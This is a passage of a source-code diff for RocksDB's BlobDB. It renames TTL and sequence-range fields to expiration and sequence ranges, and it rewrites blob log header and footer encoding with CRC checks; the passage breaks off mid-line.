(BlobLogHeader::kHeaderSize + BlobLogRecord::kHeaderSize + key.size())) { + (BlobLogHeader::kSize + BlobLogRecord::kHeaderSize + key.size())) { if (debug_level_ >= 2) { ROCKS_LOG_ERROR(db_options_.info_log, "Invalid blob index file_number: %" PRIu64 @@ -1085,7 +1077,9 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, valueptr = &value_c; } - // allocate the buffer. This is safe in C++11 + // Allocate the buffer. This is safe in C++11 + // Note that std::string::reserved() does not work, since previous value + // of the buffer can be larger than blob_index.size(). valueptr->resize(blob_index.size()); char* buffer = &(*valueptr)[0]; @@ -1103,6 +1097,7 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::NotFound("Blob Not Found as couldnt retrieve Blob"); } + // TODO(yiwu): Add an option to skip crc checking. Slice crc_slice; uint32_t crc_exp; std::string crc_str; @@ -1121,7 +1116,8 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::NotFound("Blob Not Found as couldnt retrieve CRC"); } - uint32_t crc = crc32c::Extend(0, blob_value.data(), blob_value.size()); + uint32_t crc = crc32c::Value(key.data(), key.size()); + crc = crc32c::Extend(crc, blob_value.data(), blob_value.size()); crc = crc32c::Mask(crc); // Adjust for storage if (crc != crc_exp) { if (debug_level_ >= 2) { @@ -1134,6 +1130,8 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, return Status::Corruption("Corruption. Blob CRC mismatch"); } + // TODO(yiwu): Should use compression flag in the blob file instead of + // current compression option. if (bdb_options_.compression != kNoCompression) { BlockContents contents; auto cfh = reinterpret_cast(DefaultColumnFamily()); @@ -1204,7 +1202,7 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { "Blob File %s %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64 " %" PRIu64, bfile->PathName().c_str(), bfile->GetFileSize(), bfile->BlobCount(), bfile->deleted_count_, bfile->deleted_size_, - (bfile->ttl_range_.second - epoch_now)); + (bfile->expiration_range_.second - epoch_now)); } // reschedule @@ -1255,7 +1253,7 @@ bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( const std::shared_ptr& bfile) { assert(bfile->Obsolete()); - SequenceNumber esn = bfile->GetSNRange().first; + SequenceNumber esn = bfile->GetSequenceRange().first; // TODO(yiwu): Here we should check instead if there is an active snapshot // lies between the first sequence in the file, and the last sequence by @@ -1412,7 +1410,7 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { { ReadLock lockbfile_r(&bfile->mutex_); - if (bfile->ttl_range_.second > epoch_now) continue; + if (bfile->expiration_range_.second > epoch_now) continue; process_files.push_back(bfile); } } @@ -1586,22 +1584,24 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool first_gc = bfptr->gc_once_after_open_; - auto* cfh = bfptr->GetColumnFamily(db_); + auto* cfh = + db_impl_->GetColumnFamilyHandleUnlocked(bfptr->column_family_id()); auto* cfd = reinterpret_cast(cfh)->cfd(); auto column_family_id = cfd->GetID(); - bool has_ttl = header.HasTTL(); + bool has_ttl = header.has_ttl; // this reads the key but skips the blob Reader::ReadLevel shallow = Reader::kReadHeaderKey; - bool no_relocation_ttl = (has_ttl && now >= bfptr->GetTTLRange().second); + bool no_relocation_ttl = + (has_ttl && now >= bfptr->GetExpirationRange().second); bool no_relocation_lsmdel = false; { ReadLock lockbfile_r(&bfptr->mutex_); - no_relocation_lsmdel = (bfptr->GetFileSize() == - (BlobLogHeader::kHeaderSize + bfptr->deleted_size_ + - BlobLogFooter::kFooterSize)); + no_relocation_lsmdel = + (bfptr->GetFileSize() == + (BlobLogHeader::kSize + bfptr->deleted_size_ + BlobLogFooter::kSize)); } bool no_relocation = no_relocation_ttl || no_relocation_lsmdel; @@ -1640,7 +1640,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool is_blob_index = false; PinnableSlice index_entry; Status get_status = db_impl_->GetImpl( - ReadOptions(), cfh, record.Key(), &index_entry, nullptr /*value_found*/, + ReadOptions(), cfh, record.key, &index_entry, nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB"); if (!get_status.ok() && !get_status.ok()) { @@ -1671,15 +1671,15 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, continue; } - GarbageCollectionWriteCallback callback(cfd, record.Key(), latest_seq); + GarbageCollectionWriteCallback callback(cfd, record.key, latest_seq); // If key has expired, remove it from base DB. - if (no_relocation_ttl || (has_ttl && now >= record.GetTTL())) { + if (no_relocation_ttl || (has_ttl && now >= record.expiration)) { gc_stats->num_deletes++; - gc_stats->deleted_size += record.GetBlobSize(); + gc_stats->deleted_size += record.value_size; TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"); WriteBatch delete_batch; - Status delete_status = delete_batch.Delete(record.Key()); + Status delete_status = delete_batch.Delete(record.key); if (delete_status.ok()) { delete_status = db_impl_->WriteWithCallback(WriteOptions(), &delete_batch, &callback); @@ -1718,7 +1718,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, newfile->header_ = std::move(header); // Can't use header beyond this point newfile->header_valid_ = true; - newfile->file_size_ = BlobLogHeader::kHeaderSize; + newfile->file_size_ = BlobLogHeader::kSize; s = new_writer->WriteHeader(newfile->header_); if (!s.ok()) { @@ -1740,21 +1740,21 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, uint64_t new_blob_offset = 0; uint64_t new_key_offset = 0; // write the blob to the blob log. - s = new_writer->AddRecord(record.Key(), record.Blob(), &new_key_offset, - &new_blob_offset, record.GetTTL()); + s = new_writer->AddRecord(record.key, record.value, record.expiration, + &new_key_offset, &new_blob_offset); BlobIndex::EncodeBlob(&new_index_entry, newfile->BlobFileNumber(), - new_blob_offset, record.Blob().size(), + new_blob_offset, record.value.size(), bdb_options_.compression); newfile->blob_count_++; newfile->file_size_ += - BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size(); + BlobLogRecord::kHeaderSize + record.key.size() + record.value.size(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); WriteBatch rewrite_batch; Status rewrite_status = WriteBatchInternal::PutBlobIndex( - &rewrite_batch, column_family_id, record.Key(), new_index_entry); + &rewrite_batch, column_family_id, record.key, new_index_entry); if (rewrite_status.ok()) { rewrite_status = db_impl_->WriteWithCallback(WriteOptions(), &rewrite_batch, &callback); @@ -1797,8 +1797,8 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, bool is_oldest_simple_blob_file, std::string* reason) { if (bfile->HasTTL()) { - ttlrange_t ttl_range = bfile->GetTTLRange(); - if (now > ttl_range.second) { + ExpirationRange expiration_range = bfile->GetExpirationRange(); + if (now > expiration_range.second) { *reason = "entire file ttl expired"; return true; } @@ -1941,11 +1941,12 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { return false; } - ColumnFamilyHandle* cfh = bfile->GetColumnFamily(db_); + ColumnFamilyHandle* cfh = + db_impl_->GetColumnFamilyHandleUnlocked(bfile->column_family_id()); BlobLogRecord record; Reader::ReadLevel full = Reader::kReadHeaderKeyBlob; while (reader->ReadRecord(&record, full).ok()) { - bdb_options_.gc_evict_cb_fn(cfh, record.Key(), record.Blob()); + bdb_options_.gc_evict_cb_fn(cfh, record.key, record.value); } return true; @@ -2038,15 +2039,15 @@ void BlobDBImpl::FilterSubsetOfFiles( "File has been skipped for GC ttl %s %" PRIu64 " %" PRIu64 " reason='%s'", bfile->PathName().c_str(), now, - bfile->GetTTLRange().second, reason.c_str()); + bfile->GetExpirationRange().second, reason.c_str()); continue; } ROCKS_LOG_INFO(db_options_.info_log, "File has been chosen for GC ttl %s %" PRIu64 " %" PRIu64 " reason='%s'", - bfile->PathName().c_str(), now, bfile->GetTTLRange().second, - reason.c_str()); + bfile->PathName().c_str(), now, + bfile->GetExpirationRange().second, reason.c_str()); to_process->push_back(bfile); } } diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 6f16e5b3d4c..85507eb5f00 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -1012,11 +1012,11 @@ TEST_F(BlobDBTest, InlineSmallValues) { ttl_file = blob_files[1]; } ASSERT_FALSE(non_ttl_file->HasTTL()); - ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSNRange().first); - ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSNRange().second); + ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSequenceRange().first); + ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSequenceRange().second); ASSERT_TRUE(ttl_file->HasTTL()); - ASSERT_EQ(first_ttl_seq, ttl_file->GetSNRange().first); - ASSERT_EQ(last_ttl_seq, ttl_file->GetSNRange().second); + ASSERT_EQ(first_ttl_seq, ttl_file->GetSequenceRange().first); + ASSERT_EQ(last_ttl_seq, ttl_file->GetSequenceRange().second); } } // namespace blob_db diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc index e9b7351bb23..b7ae8162d44 100644 --- a/utilities/blob_db/blob_dump_tool.cc +++ b/utilities/blob_db/blob_dump_tool.cc @@ -18,7 +18,6 @@ #include "rocksdb/convenience.h" #include "rocksdb/env.h" #include "util/coding.h" -#include "util/crc32c.h" #include "util/string_util.h" namespace rocksdb { @@ -92,7 +91,7 @@ Status BlobDumpTool::Read(uint64_t offset, size_t size, Slice* result) { Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) { Slice slice; - Status s = Read(0, BlobLogHeader::kHeaderSize, &slice); + Status s = Read(0, BlobLogHeader::kSize, &slice); if (!s.ok()) { return s; } @@ -102,20 +101,19 @@ Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) { return s; } fprintf(stdout, "Blob log header:\n"); - fprintf(stdout, " Magic Number : %" PRIu32 "\n", header.magic_number()); - fprintf(stdout, " Version : %" PRIu32 "\n", header.version()); - CompressionType compression = header.compression(); + fprintf(stdout, " Version : %" PRIu32 "\n", header.version); + fprintf(stdout, " Column Family ID : %" PRIu32 "\n", + header.column_family_id); std::string compression_str; - if (!GetStringFromCompressionType(&compression_str, compression).ok()) { + if (!GetStringFromCompressionType(&compression_str, header.compression) + .ok()) { compression_str = "Unrecongnized compression type (" + - ToString((int)header.compression()) + ")"; - } - fprintf(stdout, " Compression : %s\n", compression_str.c_str()); - fprintf(stdout, " TTL Range : %s\n", - GetString(header.ttl_range()).c_str()); - fprintf(stdout, " Timestamp Range: %s\n", - GetString(header.ts_range()).c_str()); - *offset = BlobLogHeader::kHeaderSize; + ToString((int)header.compression) + ")"; + } + fprintf(stdout, " Compression : %s\n", compression_str.c_str()); + fprintf(stdout, " Expiration range : %s\n", + GetString(header.expiration_range).c_str()); + *offset = BlobLogHeader::kSize; return s; } @@ -126,20 +124,12 @@ Status BlobDumpTool::DumpBlobLogFooter(uint64_t file_size, fprintf(stdout, "No blob log footer.\n"); return Status::OK(); }; - if (file_size < BlobLogHeader::kHeaderSize + BlobLogFooter::kFooterSize) { + if (file_size < BlobLogHeader::kSize + BlobLogFooter::kSize) { return no_footer(); } Slice slice; - Status s = Read(file_size - 4, 4, &slice); - if (!s.ok()) { - return s; - } - uint32_t magic_number = DecodeFixed32(slice.data()); - if (magic_number != kMagicNumber) { - return no_footer(); - } - *footer_offset = file_size - BlobLogFooter::kFooterSize; - s = Read(*footer_offset, BlobLogFooter::kFooterSize, &slice); + *footer_offset = file_size - BlobLogFooter::kSize; + Status s = Read(*footer_offset, BlobLogFooter::kSize, &slice); if (!s.ok()) { return s; } @@ -149,13 +139,11 @@ Status BlobDumpTool::DumpBlobLogFooter(uint64_t file_size, return s; } fprintf(stdout, "Blob log footer:\n"); - fprintf(stdout, " Blob count : %" PRIu64 "\n", footer.GetBlobCount()); - fprintf(stdout, " TTL Range : %s\n", - GetString(footer.GetTTLRange()).c_str()); - fprintf(stdout, " Time Range : %s\n", - GetString(footer.GetTimeRange()).c_str()); - fprintf(stdout, " Sequence Range : %s\n", - GetString(footer.GetSNRange()).c_str()); + fprintf(stdout, " Blob count : %" PRIu64 "\n", footer.blob_count); + fprintf(stdout, " Expiration Range : %s\n", + GetString(footer.expiration_range).c_str()); + fprintf(stdout, " Sequence Range : %s\n", + GetString(footer.sequence_range).c_str()); return s; } @@ -173,41 +161,25 @@ Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob, if (!s.ok()) { return s; } - uint32_t key_size = record.GetKeySize(); - uint64_t blob_size = record.GetBlobSize(); - fprintf(stdout, " key size : %" PRIu32 "\n", key_size); - fprintf(stdout, " blob size : %" PRIu64 "\n", record.GetBlobSize()); - fprintf(stdout, " TTL : %" PRIu64 "\n", record.GetTTL()); - fprintf(stdout, " time : %" PRIu64 "\n", record.GetTimeVal()); - fprintf(stdout, " type : %d, %d\n", record.type(), record.subtype()); - fprintf(stdout, " header CRC : %" PRIu32 "\n", record.header_checksum()); - fprintf(stdout, " CRC : %" PRIu32 "\n", record.checksum()); - uint32_t header_crc = - crc32c::Extend(0, slice.data(), slice.size() - 2 * sizeof(uint32_t)); + uint64_t key_size = record.key_size; + uint64_t value_size = record.value_size; + fprintf(stdout, " key size : %" PRIu64 "\n", key_size); + fprintf(stdout, " value size : %" PRIu64 "\n", value_size); + fprintf(stdout, " expiration : %" PRIu64 "\n", record.expiration); *offset += BlobLogRecord::kHeaderSize; - s = Read(*offset, key_size + blob_size, &slice); + s = Read(*offset, key_size + value_size, &slice); if (!s.ok()) { return s; } - header_crc = crc32c::Extend(header_crc, slice.data(), key_size); - header_crc = crc32c::Mask(header_crc); - if (header_crc != record.header_checksum()) { - return Status::Corruption("Record header checksum mismatch."); - } - uint32_t blob_crc = crc32c::Extend(0, slice.data() + key_size, blob_size); - blob_crc = crc32c::Mask(blob_crc); - if (blob_crc != record.checksum()) { - return Status::Corruption("Blob checksum mismatch."); - } if (show_key != DisplayType::kNone) { fprintf(stdout, " key : "); DumpSlice(Slice(slice.data(), key_size), show_key); if (show_blob != DisplayType::kNone) { fprintf(stdout, " blob : "); - DumpSlice(Slice(slice.data() + key_size, blob_size), show_blob); + DumpSlice(Slice(slice.data() + key_size, value_size), show_blob); } } - *offset += key_size + blob_size; + *offset += key_size + value_size; return s; } diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index 9989bacf3d8..d50256ca665 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -15,6 +15,8 @@ #include #include +#include "db/column_family.h" +#include "db/db_impl.h" #include "db/dbformat.h" #include "util/filename.h" #include "util/logging.h" @@ -27,6 +29,7 @@ namespace blob_db { BlobFile::BlobFile() : parent_(nullptr), file_number_(0), + has_ttl_(false), blob_count_(0), gc_epoch_(-1), file_size_(0), @@ -35,9 +38,8 @@ BlobFile::BlobFile() closed_(false), can_be_deleted_(false), gc_once_after_open_(false), - ttl_range_(std::make_pair(0, 0)), - time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(kMaxSequenceNumber, 0)), + expiration_range_({0, 0}), + sequence_range_({kMaxSequenceNumber, 0}), last_access_(-1), last_fsync_(0), header_valid_(false) {} @@ -46,6 +48,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) : parent_(p), path_to_dir_(bdir), file_number_(fn), + has_ttl_(false), blob_count_(0), gc_epoch_(-1), file_size_(0), @@ -54,9 +57,8 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) closed_(false), can_be_deleted_(false), gc_once_after_open_(false), - ttl_range_(std::make_pair(0, 0)), - time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(kMaxSequenceNumber, 0)), + expiration_range_({0, 0}), + sequence_range_({kMaxSequenceNumber, 0}), last_access_(-1), last_fsync_(0), header_valid_(false) {} @@ -72,6 +74,13 @@ BlobFile::~BlobFile() { } } +uint32_t BlobFile::column_family_id() const { + // TODO(yiwu): Should return column family id encoded in blob file after + // we add blob db column family support. + return reinterpret_cast(parent_->DefaultColumnFamily()) + ->GetID(); +} + std::string BlobFile::PathName() const { return BlobFileName(path_to_dir_, file_number_); } @@ -101,13 +110,14 @@ std::string BlobFile::DumpState() const { "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64 " file_size: %" PRIu64 " deleted_count: %" PRIu64 " deleted_size: %" PRIu64 - " closed: %d can_be_deleted: %d ttl_range: (%" PRIu64 ", %" PRIu64 - ") sn_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d", + " closed: %d can_be_deleted: %d expiration_range: (%" PRIu64 + ", %" PRIu64 ") sequence_range: (%" PRIu64 " %" PRIu64 + "), writer: %d reader: %d", path_to_dir_.c_str(), file_number_, blob_count_.load(), gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_, - closed_.load(), can_be_deleted_.load(), ttl_range_.first, - ttl_range_.second, sn_range_.first, sn_range_.second, - (!!log_writer_), (!!ra_file_reader_)); + closed_.load(), can_be_deleted_.load(), expiration_range_.first, + expiration_range_.second, sequence_range_.first, + sequence_range_.second, (!!log_writer_), (!!ra_file_reader_)); return str; } @@ -122,17 +132,18 @@ Status BlobFile::WriteFooterAndCloseLocked() { "File is being closed after footer %s", PathName().c_str()); BlobLogFooter footer; - footer.blob_count_ = blob_count_; - if (HasTTL()) footer.set_ttl_range(ttl_range_); + footer.blob_count = blob_count_; + if (HasTTL()) { + footer.expiration_range = expiration_range_; + } - footer.sn_range_ = sn_range_; - if (HasTimestamp()) footer.set_time_range(time_range_); + footer.sequence_range = sequence_range_; // this will close the file and reset the Writable File Pointer. Status s = log_writer_->AppendFooter(footer); if (s.ok()) { closed_ = true; - file_size_ += BlobLogFooter::kFooterSize; + file_size_ += BlobLogFooter::kSize; } else { ROCKS_LOG_ERROR(parent_->db_options_.info_log, "Failure to read Header for blob-file %s", @@ -144,20 +155,20 @@ Status BlobFile::WriteFooterAndCloseLocked() { } Status BlobFile::ReadFooter(BlobLogFooter* bf) { - if (file_size_ < (BlobLogHeader::kHeaderSize + BlobLogFooter::kFooterSize)) { + if (file_size_ < (BlobLogHeader::kSize + BlobLogFooter::kSize)) { return Status::IOError("File does not have footer", PathName()); } - uint64_t footer_offset = file_size_ - BlobLogFooter::kFooterSize; + uint64_t footer_offset = file_size_ - BlobLogFooter::kSize; // assume that ra_file_reader_ is valid before we enter this assert(ra_file_reader_); Slice result; - char scratch[BlobLogFooter::kFooterSize + 10]; - Status s = ra_file_reader_->Read(footer_offset, BlobLogFooter::kFooterSize, - &result, scratch); + char scratch[BlobLogFooter::kSize + 10]; + Status s = ra_file_reader_->Read(footer_offset, BlobLogFooter::kSize, &result, + scratch); if (!s.ok()) return s; - if (result.size() != BlobLogFooter::kFooterSize) { + if (result.size() != BlobLogFooter::kSize) { // should not happen return Status::IOError("EOF reached before footer"); } @@ -167,21 +178,12 @@ Status BlobFile::ReadFooter(BlobLogFooter* bf) { } Status BlobFile::SetFromFooterLocked(const BlobLogFooter& footer) { - if (footer.HasTTL() != header_.HasTTL()) { - return Status::Corruption("has_ttl mismatch"); - } - if (footer.HasTimestamp() != header_.HasTimestamp()) { - return Status::Corruption("has_ts mismatch"); - } - // assume that file has been fully fsync'd last_fsync_.store(file_size_); - blob_count_ = footer.GetBlobCount(); - ttl_range_ = footer.GetTTLRange(); - time_range_ = footer.GetTimeRange(); - sn_range_ = footer.GetSNRange(); + blob_count_ = footer.blob_count; + expiration_range_ = footer.expiration_range; + sequence_range_ = footer.sequence_range; closed_ = true; - return Status::OK(); } @@ -229,10 +231,6 @@ std::shared_ptr BlobFile::GetOrOpenRandomAccessReader( return ra_file_reader_; } -ColumnFamilyHandle* BlobFile::GetColumnFamily(DB* db) { - return db->DefaultColumnFamily(); -} - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_file.h b/utilities/blob_db/blob_file.h index a18bf778abe..455383448bb 100644 --- a/utilities/blob_db/blob_file.h +++ b/utilities/blob_db/blob_file.h @@ -13,11 +13,14 @@ #include "rocksdb/options.h" #include "util/file_reader_writer.h" #include "utilities/blob_db/blob_log_format.h" +#include "utilities/blob_db/blob_log_reader.h" #include "utilities/blob_db/blob_log_writer.h" namespace rocksdb { namespace blob_db { +class BlobDBImpl; + class BlobFile { friend class BlobDBImpl; friend struct blobf_compare_ttl; @@ -34,6 +37,10 @@ class BlobFile { // after that uint64_t file_number_; + // If true, the keys in this file all has TTL. Otherwise all keys don't + // have TTL. + bool has_ttl_; + // number of blobs in the file std::atomic blob_count_; @@ -62,14 +69,9 @@ class BlobFile { // should this file been gc'd once to reconcile lost deletes/compactions std::atomic gc_once_after_open_; - // et - lt of the blobs - ttlrange_t ttl_range_; - - // et - lt of the timestamp of the KV pairs. - tsrange_t time_range_; + ExpirationRange expiration_range_; - // ESN - LSN of the blobs - snrange_t sn_range_; + SequenceRange sequence_range_; // Sequential/Append writer for blobs std::shared_ptr log_writer_; @@ -96,7 +98,7 @@ class BlobFile { ~BlobFile(); - ColumnFamilyHandle* GetColumnFamily(DB* db); + uint32_t column_family_id() const; // Returns log file's pathname relative to the main db dir // Eg. For a live-log-file = blob_dir/000003.blob @@ -128,30 +130,29 @@ class BlobFile { } // All Get functions which are not atomic, will need ReadLock on the mutex - tsrange_t GetTimeRange() const { - assert(HasTimestamp()); - return time_range_; - } - - ttlrange_t GetTTLRange() const { return ttl_range_; } - snrange_t GetSNRange() const { return sn_range_; } + ExpirationRange GetExpirationRange() const { return expiration_range_; } - bool HasTTL() const { - assert(header_valid_); - return header_.HasTTL(); + void ExtendExpirationRange(uint64_t expiration) { + expiration_range_.first = std::min(expiration_range_.first, expiration); + expiration_range_.second = std::max(expiration_range_.second, expiration); } - bool HasTimestamp() const { - assert(header_valid_); - return header_.HasTimestamp(); + SequenceRange GetSequenceRange() const { return sequence_range_; } + + void SetSequenceRange(SequenceRange sequence_range) { + sequence_range_ = sequence_range; } void ExtendSequenceRange(SequenceNumber sequence) { - sn_range_.first = std::min(sn_range_.first, sequence); - sn_range_.second = std::max(sn_range_.second, sequence); + sequence_range_.first = std::min(sequence_range_.first, sequence); + sequence_range_.second = std::max(sequence_range_.second, sequence); } + bool HasTTL() const { return has_ttl_; } + + void SetHasTTL(bool has_ttl) { has_ttl_ = has_ttl; } + std::shared_ptr GetWriter() const { return log_writer_; } void Fsync(); @@ -174,11 +175,9 @@ class BlobFile { // previously closed file Status SetFromFooterLocked(const BlobLogFooter& footer); - void set_time_range(const tsrange_t& tr) { time_range_ = tr; } - - void set_ttl_range(const ttlrange_t& ttl) { ttl_range_ = ttl; } - - void SetSNRange(const snrange_t& snr) { sn_range_ = snr; } + void set_expiration_range(const ExpirationRange& expiration_range) { + expiration_range_ = expiration_range; + } // The following functions are atomic, and don't need locks void SetFileSize(uint64_t fs) { file_size_ = fs; } diff --git a/utilities/blob_db/blob_log_format.cc b/utilities/blob_db/blob_log_format.cc index 2e6fa3c63c9..eb748ac994c 100644 --- a/utilities/blob_db/blob_log_format.cc +++ b/utilities/blob_db/blob_log_format.cc @@ -6,284 +6,145 @@ #ifndef ROCKSDB_LITE #include "utilities/blob_db/blob_log_format.h" + #include "util/coding.h" #include "util/crc32c.h" namespace rocksdb { namespace blob_db { -const uint32_t kMagicNumber = 2395959; -const uint32_t kVersion1 = 1; -const size_t kBlockSize = 32768; - -BlobLogHeader::BlobLogHeader() - : magic_number_(kMagicNumber), compression_(kNoCompression) {} - -BlobLogHeader& BlobLogHeader::operator=(BlobLogHeader&& in) noexcept { - if (this != &in) { - magic_number_ = in.magic_number_; - version_ = in.version_; - ttl_guess_ = std::move(in.ttl_guess_); - ts_guess_ = std::move(in.ts_guess_); - compression_ = in.compression_; - } - return *this; +void BlobLogHeader::EncodeTo(std::string* dst) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(BlobLogHeader::kSize); + PutFixed32(dst, kMagicNumber); + PutFixed32(dst, version); + PutFixed32(dst, column_family_id); + unsigned char flags = (has_ttl ? 1 : 0); + dst->push_back(flags); + dst->push_back(compression); + PutFixed64(dst, expiration_range.first); + PutFixed64(dst, expiration_range.second); } -BlobLogFooter::BlobLogFooter() : magic_number_(kMagicNumber), blob_count_(0) {} - -Status BlobLogFooter::DecodeFrom(const Slice& input) { - Slice slice(input); - uint32_t val; - if (!GetFixed32(&slice, &val)) { - return Status::Corruption("Invalid Blob Footer: flags"); - } - - bool has_ttl = false; - bool has_ts = false; - val >>= 8; - RecordSubType st = static_cast(val); - switch (st) { - case kRegularType: - break; - case kTTLType: - has_ttl = true; - break; - case kTimestampType: - has_ts = true; - break; - default: - return Status::Corruption("Invalid Blob Footer: flags_val"); - } - - if (!GetFixed64(&slice, &blob_count_)) { - return Status::Corruption("Invalid Blob Footer: blob_count"); - } - - ttlrange_t temp_ttl; - if (!GetFixed64(&slice, &temp_ttl.first) || - !GetFixed64(&slice, &temp_ttl.second)) { - return Status::Corruption("Invalid Blob Footer: ttl_range"); - } - if (has_ttl) { - ttl_range_.reset(new ttlrange_t(temp_ttl)); - } - - if (!GetFixed64(&slice, &sn_range_.first) || - !GetFixed64(&slice, &sn_range_.second)) { - return Status::Corruption("Invalid Blob Footer: sn_range"); - } - - tsrange_t temp_ts; - if (!GetFixed64(&slice, &temp_ts.first) || - !GetFixed64(&slice, &temp_ts.second)) { - return Status::Corruption("Invalid Blob Footer: ts_range"); - } - if (has_ts) { - ts_range_.reset(new tsrange_t(temp_ts)); - } - - if (!GetFixed32(&slice, &magic_number_) || magic_number_ != kMagicNumber) { - return Status::Corruption("Invalid Blob Footer: magic"); +Status BlobLogHeader::DecodeFrom(Slice src) { + static const std::string kErrorMessage = + "Error while decoding blob log header"; + if (src.size() != BlobLogHeader::kSize) { + return Status::Corruption(kErrorMessage, + "Unexpected blob file header size"); + } + uint32_t magic_number; + unsigned char flags; + if (!GetFixed32(&src, &magic_number) || !GetFixed32(&src, &version) || + !GetFixed32(&src, &column_family_id)) { + return Status::Corruption( + kErrorMessage, + "Error decoding magic number, version and column family id"); + } + if (magic_number != kMagicNumber) { + return Status::Corruption(kErrorMessage, "Magic number mismatch"); + } + if (version != kVersion1) { + return Status::Corruption(kErrorMessage, "Unknown header version"); + } + flags = src.data()[0]; + compression = static_cast(src.data()[1]); + has_ttl = (flags & 1) == 1; + src.remove_prefix(2); + if (!GetFixed64(&src, &expiration_range.first) || + !GetFixed64(&src, &expiration_range.second)) { + return Status::Corruption(kErrorMessage, "Error decoding expiration range"); } - return Status::OK(); } -void BlobLogFooter::EncodeTo(std::string* dst) const { - dst->reserve(kFooterSize); - - RecordType rt = kFullType; - RecordSubType st = kRegularType; - if (HasTTL()) { - st = kTTLType; - } else if (HasTimestamp()) { - st = kTimestampType; - } - uint32_t val = static_cast(rt) | (static_cast(st) << 8); - PutFixed32(dst, val); - - PutFixed64(dst, blob_count_); - bool has_ttl = HasTTL(); - bool has_ts = HasTimestamp(); - - if (has_ttl) { - PutFixed64(dst, ttl_range_.get()->first); - PutFixed64(dst, ttl_range_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); - } - PutFixed64(dst, sn_range_.first); - PutFixed64(dst, sn_range_.second); - - if (has_ts) { - PutFixed64(dst, ts_range_.get()->first); - PutFixed64(dst, ts_range_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); - } - - PutFixed32(dst, magic_number_); +void BlobLogFooter::EncodeTo(std::string* dst) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(BlobLogFooter::kSize); + PutFixed32(dst, kMagicNumber); + PutFixed64(dst, blob_count); + PutFixed64(dst, expiration_range.first); + PutFixed64(dst, expiration_range.second); + PutFixed64(dst, sequence_range.first); + PutFixed64(dst, sequence_range.second); + crc = crc32c::Value(dst->c_str(), dst->size()); + crc = crc32c::Mask(crc); + PutFixed32(dst, crc); } -void BlobLogHeader::EncodeTo(std::string* dst) const { - dst->reserve(kHeaderSize); - - PutFixed32(dst, magic_number_); - - PutFixed32(dst, version_); - - RecordSubType st = kRegularType; - bool has_ttl = HasTTL(); - bool has_ts = HasTimestamp(); - - if (has_ttl) { - st = kTTLType; - } else if (has_ts) { - st = kTimestampType; - } - uint32_t val = - static_cast(st) | (static_cast(compression_) << 8); - PutFixed32(dst, val); - - if (has_ttl) { - PutFixed64(dst, ttl_guess_.get()->first); - PutFixed64(dst, ttl_guess_.get()->second); - } else { - PutFixed64(dst, 0); - PutFixed64(dst, 0); +Status BlobLogFooter::DecodeFrom(Slice src) { + static const std::string kErrorMessage = + "Error while decoding blob log footer"; + if (src.size() != BlobLogFooter::kSize) { + return Status::Corruption(kErrorMessage, + "Unexpected blob file footer size"); + } + uint32_t src_crc = 0; + src_crc = crc32c::Value(src.data(), BlobLogFooter::kSize - 4); + src_crc = crc32c::Mask(src_crc); + uint32_t magic_number; + if (!GetFixed32(&src, &magic_number) || !GetFixed64(&src, &blob_count) || + !GetFixed64(&src, &expiration_range.first) || + !GetFixed64(&src, &expiration_range.second) || + !GetFixed64(&src, &sequence_range.first) || + !GetFixed64(&src, &sequence_range.second) || !GetFixed32(&src, &crc)) { + return Status::Corruption(kErrorMessage, "Error decoding content"); + } + if (magic_number != kMagicNumber) { + return Status::Corruption(kErrorMessage, "Magic number mismatch"); + } + if (src_crc != crc) { + return Status::Corruption(kErrorMessage, "CRC 